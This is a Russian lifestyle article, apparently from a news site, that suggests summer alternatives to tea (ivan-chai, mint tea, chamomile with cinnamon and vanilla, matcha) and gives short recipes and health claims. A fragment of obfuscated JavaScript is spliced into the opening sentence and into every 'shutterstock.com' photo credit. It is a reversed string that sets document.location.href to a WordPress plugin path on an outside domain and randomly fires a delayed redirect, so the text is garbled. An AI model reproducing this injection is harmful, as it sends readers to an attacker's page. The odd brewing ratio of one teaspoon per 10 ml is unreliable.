Чёрный и зелёный чай — вечная классика, но иногда хочется разнообразия в напитках. fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru рассказывает, чем заменить летом чай, и делится простыми рецептами.
Иван-чай
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Иван-чай — традиционный русский напиток. С древних времён кипрей узколистный (другое название иван-чая) заваривали и пили люди с разным уровнем достатка. В конце XVIII века иван-чай уступил позицию самого популярного напитка индийскому чёрному чаю и стал меньше экспортироваться. В последнее время на иван-чай снова обратили внимание приверженцы здорового образа жизни. На Аляске, например, из него делают конфеты, сироп и мороженое.
Главная особенность иван-чая в том, что напиток не содержит кофеин, имеет яркий травяной вкус. Иван-чай можно пить как горячим, так и охлаждённым.
Как приготовить:
- Ополосните заварочный чайник кипятком.
- Насыпьте чай из расчёта 1 чайная ложка на 10 мл воды (температура — 60–90 градусов).
- Заваривайте 10–15 минут.
Мятный чай
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Напиток из мяты — один из самых популярных травяных чаёв в мире. Испытания на животных показали, что мятный чай поддерживает здоровое пищеварение. Есть предположения, что листья мяты обладает противомикробными и антиоксидантными свойствами, а масло мяты улучшает самочувствие при синдроме раздражённого кишечника. Масло мяты может помочь при расстройстве желудка, тошноте и болях в животе.
Клинических испытаний мятного чая на людях пока не было, но холодный мятный чай в разумных количествах — отличный освежающий напиток на лето.
Как приготовить:
- Пучок мяты промойте под водой.
- Вскипятите воду и залейте мяту кипятком.
- Заваривайте 15–20 минут.
- Охладите и подавайте.
Ромашка с корицей и ванилью
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Ещё одно популярное растение для заваривания — ромашка. Её ненавязчивый вкус у многих ассоциируется с успокоением и вечерним временем. Специалисты Mayo Clinic отмечают, что в краткосрочной перспективе ромашка способна снижать тревожность.
Учёные также предполагают, что ромашка обладает антибактериальным, противовоспалительным эффектами и защищает печень. Ромашковый чай уменьшает симптомы предменструального синдрома. Вкус ромашки хорошо дополняют корица и ваниль. Корица богата антиоксидантами, а ваниль содержит магний и калий.
Как приготовить:
- В чайник положите фильтр-пакет с ромашкой, добавьте щепотку корицы и ванили.
- Залейте кипятком и дайте настояться.
- Процедите и подавайте напиток горячим.
Матча
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Матча (он же маття) — японский чай зелёного цвета. Матча получают из чайных листьев, которые растут в тени и за счёт этого набираются полезных свойств. Матча способна улучшать внимание и повышать концентрацию, а также снижать уровень «плохого» холестерина в крови. В одной чашке напитка содержится в 137 раз больше катехинов (мощных антиоксидантов), чем в стакане зелёного чая.
Для приготовления матча потребуется специальный порошок, а также венчик, который помогает смешать чай с водой до однородной консистенции.
Как приготовить:
- Воду подогрейте до 80 градусов.
- Смешайте 1 чайную ложку матча с горячей водой в широкой кружке с помощью венчика.
- Добавьте горячее молоко по вкусу.
Статьи по теме
Далгона-кофе: почему во время карантина напиток стал таким популярным
«Пришлось оптимизировать меню»: как выживают кофейни в условиях пандемии
Вопрос: зелёный чай полезнее чёрного?
Учёные не советуют пить горячий чай. И вот почему